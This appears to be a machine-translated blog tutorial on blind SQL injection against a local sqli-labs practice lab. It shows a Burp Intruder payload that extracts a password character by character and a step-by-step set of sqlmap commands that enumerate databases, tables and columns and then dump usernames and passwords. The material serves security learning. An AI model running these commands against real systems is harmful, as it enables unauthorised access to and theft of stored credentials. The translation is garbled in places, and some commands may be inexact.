当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- 2022 registration of G2 utility boiler stoker examination and G2 utility boiler stoker reexamination examination
- Summary of training competition (Lao Li's collection of questions)
- Writing skills of multi plate rotation strategy -- strategy writing learning materials
- 《牛客刷verilog》Part II Verilog进阶挑战
- General undergraduate college life pit avoidance Guide
- 【PHP漏洞-弱类型】基础知识、php弱相等、报错绕过
- 使用BENCHMARKSQL工具对KingbaseES预热数据时执行:select sys_prewarm(‘NDX_OORDER_2 ‘)报错
- UiPath实战(08) - 选取器(Selector)
- 【SQL注入】联合查询(最简单的注入方法)
- Know that Chuangyu cloud monitoring - scanv Max update: Ecology OA unauthorized server request forgery and other two vulnerabilities can be detected
猜你喜欢
2022 a special equipment related management (elevator) analysis and a special equipment related management (elevator) simulation test
STM32 reverse entry
有道云笔记
How to choose cross-border e-commerce multi merchant system
![[USACO 2009 Dec S]Music Notes](/img/e6/282a8820becdd24d63dcff1b81fcaf.jpg)
[USACO 2009 Dec S]Music Notes
Truncated sentences of leetcode simple questions
![[literature reading] sparse in deep learning: practicing and growth for effective information and training in NN](/img/7e/50fa6f65b5a4f0bb60909f57daff56.png)
[literature reading] sparse in deep learning: practicing and growth for effective information and training in NN
【XSS绕过-防护策略】理解防护策略,更好的绕过
Introduction of pointer variables in function parameters
JVM原理简介
随机推荐
Kingbasees plug-in KDB of Jincang database_ date_ function
2022-02-12 (338. Bit count)
How do you use lodash linking function- How do you chain functions using lodash?
移动端——uniapp开发记录(公共请求request封装)
一名外包仔的2022年中总结
Network security textual research recommendation
The usage of micro service project swagger aggregation document shows all micro service addresses in the form of swagger grouping
雇佣收银员(差分约束)
I've seen a piece of code in the past. I don't know what I'm doing. I can review it when I have time
Symbol of array element product of leetcode simple problem
[literature reading] sparse in deep learning: practicing and growth for effective information and training in NN
第十九届浙江省 I. Barbecue
金仓数据库KingbaseES 插件kdb_database_link
Redis persistence principle
C Primer Plus Chapter 10, question 14 3 × 5 array
JVM原理简介
Priv app permission exception
Some information about the developer environment in Chengdu
Php+mysql registration landing page development complete code
Arthas watch grabs a field / attribute of the input parameter